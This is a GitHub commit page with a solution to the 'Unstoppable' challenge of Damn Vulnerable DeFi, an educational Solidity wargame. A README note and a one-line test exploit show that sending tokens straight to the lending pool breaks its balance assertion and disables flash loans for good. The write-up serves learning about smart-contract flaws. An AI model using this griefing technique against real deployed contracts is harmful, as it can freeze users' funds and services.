Merge pull request #1 from olivier7delf/unstoppable

unstoppable solved -> contract is broken
olivier7delf · Dec 23, 2021 · 0b3d3b5 · 0b3d3b5
2 parents 82b6049 + ac9c1ef
commit 0b3d3b5
Show file tree

Hide file tree

Showing 2 changed files with 21 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -15,3 +15,19 @@ Visit [damnvulnerabledefi.xyz](https://damnvulnerabledefi.xyz)
 All Solidity code, practices and patterns in this repository are DAMN VULNERABLE and for educational purposes only.
 
 DO NOT USE IN PRODUCTION.
+
+
+## My solution:
+
+* Unstoppable 
+There's a lending pool with a million DVT tokens in balance, offering flash loans for free.
+If only there was a way to attack and stop the pool from offering flash loans ...
+You start with 100 DVT tokens in balance.
+
+Solution: ./test/unstoppable/unstoppable.challenge.js
+on this.token:
+using transfer() instead of depositTokens() 
+-> poolBalance = poolBalance.add(amount); is not trigger
+then, when calling function flashloan:
+-> assert(poolBalance == balanceBefore); // is now False
+
diff --git a/test/unstoppable/unstoppable.challenge.js b/test/unstoppable/unstoppable.challenge.js
@@ -40,6 +40,11 @@ describe('[Challenge] Unstoppable', function () {
 
     it('Exploit', async function () {
         /** CODE YOUR EXPLOIT HERE */
+        // on this.token:
+        // using transfer() instead of depositTokens() -> poolBalance = poolBalance.add(amount); is not trigger
+        // then, inside function flashloan:
+        //    assert(poolBalance == balanceBefore); // is now false
+        await this.token.connect(attacker).transfer(this.pool.address, INITIAL_ATTACKER_TOKEN_BALANCE);
     });
 
     after(async function () {